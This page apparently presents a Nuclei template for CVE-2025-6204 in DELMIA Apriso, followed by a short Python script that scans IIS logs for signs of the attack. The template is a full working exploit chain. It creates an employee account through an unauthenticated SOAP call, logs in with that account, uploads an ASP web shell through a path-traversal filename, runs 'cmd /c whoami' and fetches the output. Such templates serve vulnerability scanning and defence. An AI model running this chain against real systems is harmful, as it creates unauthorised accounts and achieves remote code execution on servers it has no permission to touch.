DELMIA Apriso - Command Injection
CVE-2025-6204
Verified
Description
An Improper Control of Generation of Code (code injection / file upload → RCE) vulnerability affecting DELMIA Apriso (Release 2020 → Release 2025). When an authenticated user can upload files and the upload handler fails to canonicalize filenames or enforce storage restrictions, an attacker may place executable artifacts into web-served locations (via path traversal or insufficient normalization) and achieve remote code execution under the webserver context.
Severity
Critical
CVSS Score
9
Exploit Probability
1%
Published Date
September 23, 2025
Template Author
iamnoooob, rootxharsh, parthmalhotra, pdresearch
CVE-2025-6204.yaml
id: CVE-2025-6204

info:
  name: DELMIA Apriso - Command Injection
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    An Improper Control of Generation of Code (code injection / file upload → RCE) vulnerability affecting DELMIA Apriso (Release 2020 → Release 2025). When an authenticated user can upload files and the upload handler fails to canonicalize filenames or enforce storage restrictions, an attacker may place executable artifacts into web-served locations (via path traversal or insufficient normalization) and achieve remote code execution under the webserver context.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6204
    - https://www.3ds.com/trust-center/security/security-advisories/cve-2025-6204
    - https://projectdiscovery.io/blog/remote-code-execution-in-delmia-apriso
  metadata:
    verified: true
    max-request: 5
    shodan-query: title:"DELMIA Apriso"
  classification:
    cve-id: CVE-2025-6204
    epss-score: 0.00851
    epss-percentile: 0.74096
    cwe-id: CWE-94
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
    cvss-score: 9.0
  tags: cve,cve2025,delmia,apriso,rce,traversal,upload,intrusive

flow: http(1) && http(2) && http(3) && http(4) && http(5)

variables:
  filename: "{{randbase(5)}}"
  username: "LAST"
  password: "9"

http:
  - raw:
      - |-
        POST /Apriso/MessageProcessor/FlexNetMessageProcessor.svc HTTP/2
        Host: {{Hostname}}
        Content-Type: text/xml;charset=utf-8
        Soapaction: "http://tempuri.org/IFlexNetMessageProcessor/ProcessMessageASync_v2"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
        <soapenv:Header/>
        <soapenv:Body>
        <tem:ProcessMessageASync_v2>
        <tem:xmlMessage><FlexNet_Employees xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="S:/SchemaRepository/XMLSchemas/FlexNet/FlexNet_Employees.xsd" Version="1.0">
          <Employee>
            <GivenName>FIRST</GivenName>
            <FamilyName>LAST</FamilyName>
            <EmployeeNo>08262004</EmployeeNo>
            <LoginName>{{username}}</LoginName>
            <Password>{{password}}</Password>
            <HireDate>2000-06-01T00:00:00</HireDate>
            <SpokenLanguageID>1033</SpokenLanguageID>
            <WrittenLanguageID>1033</WrittenLanguageID>
            <EmployeeValidDate>2000-06-01T00:00:00</EmployeeValidDate>
            <LoginExpirationDate>9999-12-31T00:00:00</LoginExpirationDate>
            <EmployeeType>0</EmployeeType>
            <DefaultFacility>C1P1</DefaultFacility>
            <TrackLaborFlag>true</TrackLaborFlag>
            <ResourceID NodeType="Field">
              <Resource_Insert>
                <Name>FIRST</Name>
                <ResourceName>FIRST</ResourceName>
                <ResourceType>1</ResourceType>
                <FUID NodeType="Field"/>
              </Resource_Insert>
            </ResourceID>
            <EmployeeRole>
              <EmployeeID NodeType="Field"/>
              <RoleID NodeType="Field">
                <Role>
                  <Role>Production User</Role>
                </Role>
              </RoleID>
            </EmployeeRole>
          </Employee>
        </FlexNet_Employees></tem:xmlMessage>
        <tem:applicationName>myExternalApplication</tem:applicationName>
        </tem:ProcessMessageASync_v2>
        </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: word
        part: body
        words:
          - ProcessMessageASync_v2Response
          - <ProcessMessageASync_v2Result>true</ProcessMessageASync_v2Result>
        condition: and
        internal: true

  - raw:
      - |
        GET /Apriso/Portal/Kiosk/Login.aspx HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    extractors:
      - type: regex
        part: body
        name: viewstate
        group: 1
        regex:
          - '__VIEWSTATE" value="(.*?)"'
        internal: true

      - type: regex
        part: body
        name: eventval
        group: 1
        regex:
          - '__EVENTVALIDATION" value="(.*?)"'
        internal: true

      - type: regex
        part: body
        name: viewgen
        group: 1
        regex:
          - '__VIEWSTATEGENERATOR" value="(.*?)"'
        internal: true

  - raw:
      - |-
        POST /Apriso/Portal/Kiosk/Login.aspx?BackToStartPage=true HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewgen}}&__EVENTVALIDATION={{urlencode(eventval)}}&ctl04%24LoginTextBox={{username}}&ctl04%24PasswordTextbox={{password}}&ctl04%24LogInButton=Log+In&ctl04%24HiddenValue=Initial+Value&ctl04%24HiddenValue2=Initial+Value

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
        internal: true

  # Self-deleteable ASP POC File
  - raw:
      - |
        POST /Apriso/webservices/1.1/operation.svc/UploadFile?filename=375c9638-1a4e-465d-90d7-f69321315acb-xxx\..\..\..\portal\Uploads\{{filename}}.asp HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        <%
        Response.Write "{{randstr}}" & "<br>"
        Set rs = CreateObject("WScript.Shell")
        Set cmd = rs.Exec("cmd /c whoami")
        o = cmd.StdOut.Readall()
        Response.write(o)
        Set fso = Server.CreateObject("Scripting.FileSystemObject")
        fso.DeleteFile Server.MapPath(Request.ServerVariables("SCRIPT_NAME")), True
        Set fso = Nothing
        %>

    matchers:
      - type: word
        part: body
        words:
          - Uploads
          - ResultMessage
          - FilePath
          - Success
          - "{{filename}}.asp"
        condition: and
        internal: true

  - raw:
      - |
        GET /Apriso/Portal/Uploads/{{filename}}.asp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"

    extractors:
      - type: regex
        group: 1
        regex:
          - <br>(.*)
# digest: 490a00463044022025b335782c1a875d164f3a6d333c1a734135d805b19465198114e26ffa62217e02206727bec8fe38c036db31b6f88c6221be151acdb9549415ddbdc3868e7eb40cb0:922c64590222798bb761d5b6d8e72950
9.0 Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-6204
CWE ID:
cwe-94
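A log-review sketch for the request sequence in the template above, added here and not part of the template or of the vendor's code: it scans IIS W3C extended logs for UploadFile requests whose decoded filename contains `..` segments or a script extension, and for script requests served from /Apriso/Portal/Uploads/. The URI paths come from the template; the log lines, their field order and the SCRIPT_EXT set are constructed assumptions.

```python
import ntpath
import re
from urllib.parse import unquote

# URI paths below come from the template on this page; the log lines are constructed.
UPLOAD_URI = "/apriso/webservices/1.1/operation.svc/uploadfile"
SERVED_DIR = "/apriso/portal/uploads/"
SCRIPT_EXT = {".asp", ".asa", ".cer", ".aspx", ".ashx", ".asmx"}  # assumed handler-mapped set

def classify(method, stem, query):
    """Return finding names for one request (IIS URLs are case-insensitive)."""
    findings, stem = [], stem.lower()
    if method == "POST" and stem == UPLOAD_URI:
        m = re.search(r"(?:^|&)filename=([^&]*)", query, re.I)
        name = unquote(m.group(1)) if m else ""
        # Split on both separators: Windows accepts "\" and "/" in paths.
        if ".." in re.split(r"[\\/]", name):
            findings.append("upload-traversal")
        if ntpath.splitext(name)[1].lower() in SCRIPT_EXT:
            findings.append("upload-script-extension")
    elif method == "GET" and stem.startswith(SERVED_DIR):
        if ntpath.splitext(stem)[1] in SCRIPT_EXT:
            findings.append("script-served-from-uploads")
    return findings

def scan(lines):
    """Scan W3C extended log lines, honouring the #Fields: directive."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        rec = dict(zip(fields, line.split()))
        for f in classify(rec.get("cs-method", ""), rec.get("cs-uri-stem", ""),
                          rec.get("cs-uri-query", "-")):
            hits.append((rec.get("c-ip"), f, rec.get("sc-status")))
    return hits

SAMPLE_LOG = [  # constructed lines, documentation addresses only
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2025-01-01 10:00:00 POST /Apriso/webservices/1.1/operation.svc/UploadFile "
    "filename=report.pdf 192.0.2.10 200",
    "2025-01-01 10:05:00 POST /Apriso/webservices/1.1/operation.svc/UploadFile "
    "filename=id-xxx%5C..%5C..%5Cportal%5CUploads%5Cabcde.asp 198.51.100.7 200",
    "2025-01-01 10:05:02 GET /Apriso/Portal/Uploads/abcde.asp - 198.51.100.7 200",
    "2025-01-01 10:06:00 GET /Apriso/Portal/Uploads/photo.png - 192.0.2.10 200",
]
```

Because the template's payload deletes itself after one request, the uploaded file may no longer be on disk; the log entries are the durable evidence.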